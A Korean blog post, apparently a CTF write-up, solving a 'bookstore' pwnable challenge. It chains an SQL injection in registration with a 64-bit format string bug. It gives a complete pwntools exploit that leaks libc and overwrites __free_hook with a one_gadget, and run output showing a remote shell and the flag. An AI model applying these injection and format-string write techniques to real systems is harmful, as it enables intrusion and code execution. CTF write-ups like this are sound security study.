티스토리 뷰
Summary
- sql injection
- 64bit Format String Bug
Analysis
register에서 '를 필터링하지 않아서 sql injection이 가능하다.
(login에서는 필터링함.)
그렇게 sql injection을 통해 point를 조건값으로 바꿔주면 fsb가 가능하다.
64bit fsb로 익스하면 됌.
Exploit
got가 덮으면 안따이길래 __free_hook덮었다.
from pwn import *
#s = process("bookstore")
s = remote("13.124.117.126", 31337)
e = ELF("bookstore")
s.sendlineafter(": \n", "1")
s.sendlineafter(": ", "asdf', 'asdf', 2000000000); --")
s.sendlineafter(": ", "asdf")
s.sendlineafter(": \n", "2")
s.sendlineafter(": ", "asdf")
s.sendlineafter(": ", "asdf")
s.sendlineafter(": \n", "3")
s.sendlineafter(">> \n", "2")
s.sendlineafter(": ", "%2$p")
s.recvline()
libc_base = int(s.recv(14), 16)-0x3ed8c0
print(hex(libc_base))
one_gadget = libc_base + 0x4f322
one_gadget_low = one_gadget & 0xffff
one_gadget_middle = (one_gadget >> 16) & 0xffff
one_gadget_high = (one_gadget >> 32) &0xffff
low = one_gadget_low
if one_gadget_middle > one_gadget_low:
middle = one_gadget_middle - one_gadget_low
else:
middle = 0x10000 + one_gadget_middle - one_gadget_low
if one_gadget_high > one_gadget_middle:
high = one_gadget_high - one_gadget_middle
else:
high = 0x10000 + one_gadget_high - one_gadget_middle
payload2 = ''
payload2 += '%' + str(low) +'c'
payload2 += '%'+'13'+'$hn'
payload2 += '%' + str(middle) + 'c'
payload2 += '%'+'14'+'$hn'
payload2 += '%' + str(high) + 'c'
payload2 += '%'+'15'+'$hn'
payload2 += 'A' * (8 - len(payload2) % 8)
print(len(payload2))
k=libc_base + 0x3ed8e8
payload2 += p64(k)
payload2 += p64(k+2)
payload2 += p64(k+4)
payload2 += p64(0)*10
#raw_input()
s.sendlineafter(">> \n", "2")
s.sendlineafter(": ", payload2)
s.recvuntil(">> ")
s.sendline("3")
s.recvuntil(":")
s.sendline("4")
s.recvuntil(":")
s.sendline("")
s.recvuntil(":")
s.sendline("")
s.recvuntil(":")
s.sendline("")
s.recvuntil(":")
s.sendline("3")
s.sendline("1")
s.recvuntil(":")
s.sendline("0")
s.recvuntil("sell: ")
s.interactive()root@ubuntu:~/hacking/ctf/grandpix/pwn2# python exploit.py
[+] Opening connection to 13.124.117.126 on port 31337: Done
[*] '/root/hacking/ctf/grandpix/pwn2/bookstore'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
0x7f0746979000
40
[*] Switching to interactive mode
$ cd home/bookstore
$ cat flag
WhiteHat{d2c2652a7b0578d04bf43d7cd6eb5d9b4ed318e7}
$
'pwnable > CTF write-up' 카테고리의 다른 글
| [pwnpwnpwn-13] codegate 2019 god-the-reum (0) | 2020.01.26 |
|---|---|
| [pwnpwnpwn-12] codegate 2018 Super Marimo (0) | 2020.01.24 |
| [pwnpwnpwn-2] 0ctf 2017 babyheap (0) | 2020.01.03 |
| [선린고등해커 2019] simple 풀이 (0) | 2019.12.01 |
| [Rooters 2019] Secure ROP write-up (0) | 2019.10.23 |
Comments
최근에 올라온 글
최근에 달린 댓글
TAG
- codegate
- 본선가고싶다
- oob
- HackCTF
- hacking
- ebp change
- stack reusing
- pwable
- fastbindup
- glibc
- srop
- exit
- heap
- pwnable
- 해킹
- pwnable.tw
- shellcoding
- FSB
- SQLi
- TLS
- overflow
- rt_sigreturn
- fsop
- tcache
- fastbin
- Total
- Today
- Yesterday